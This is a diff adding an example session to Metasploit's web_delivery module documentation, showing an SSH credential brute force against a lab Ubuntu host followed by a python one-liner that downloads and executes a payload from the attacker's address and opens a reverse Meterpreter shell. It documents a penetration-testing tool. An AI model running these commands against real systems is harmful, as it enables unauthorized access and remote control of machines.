diff --git a/documentation/modules/exploit/multi/script/web_delivery.md b/documentation/modules/exploit/multi/script/web_delivery.md index b4985c0d4a..a1c82d3f27 100644 --- a/documentation/modules/exploit/multi/script/web_delivery.md +++ b/documentation/modules/exploit/multi/script/web_delivery.md @@ -75,6 +75,58 @@ Here's how that can be done: 2. Interact with the shell, and copy/paste the command. 3. You should get a Meterpreter session. +An example of this process can be seen below where an Ubuntu 14.04 victim is first exploited through `auxialiary/scanner/ssh/ssh_login`, and then upgraded via `web_delivery`. + +``` +msf > use auxiliary/scanner/ssh/ssh_login +msf auxiliary(ssh_login) > set rhosts 192.168.2.156 +rhosts => 192.168.2.156 +msf auxiliary(ssh_login) > set username ubuntu +username => ubuntu +msf auxiliary(ssh_login) > set password ubuntu +password => ubuntu +msf auxiliary(ssh_login) > run + +[*] SSH - Starting bruteforce +[+] SSH - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux Ubuntu14 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux ' +[!] No active DB -- Credential data will not be saved! +[*] Command shell session 1 opened (192.168.2.117:35219 -> 192.168.2.156:22) at 2017-03-05 19:57:53 -0500 +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(ssh_login) > use exploit/multi/script/web_delivery +msf exploit(web_delivery) > set lhost 192.168.2.117 +lhost => 192.168.2.117 +msf exploit(web_delivery) > run +[*] Exploit running as background job. + +[*] Started reverse TCP handler on 192.168.2.117:4444 +[*] Using URL: http://0.0.0.0:8080/DovbvqRaB +[*] Local IP: http://192.168.2.117:8080/DovbvqRaB +[*] Server started. +[*] Run the following command on the target machine: +python -c "import urllib2; r = urllib2.urlopen('http://192.168.2.117:8080/DovbvqRaB'); exec(r.read());" +msf exploit(web_delivery) > sessions -i 1 +[*] Starting interaction with 1... + +python -c "import urllib2; r = urllib2.urlopen('http://192.168.2.117:8080/DovbvqRaB'); exec(r.read());" +[*] 192.168.2.156 web_delivery - Delivering Payload +[*] Sending stage (38500 bytes) to 192.168.2.156 +[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.156:35840) at 2017-03-05 19:59:44 -0500 + +^Z +Background session 1? [y/N] y + +msf exploit(web_delivery) > sessions -i 2 +[*] Starting interaction with 2... + +meterpreter > sysinfo +Computer : Ubuntu14 +OS : Linux 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 +Architecture : x64 +Meterpreter : python/linux +meterpreter > +``` + ## Vulnerable Pages ### Perl cgi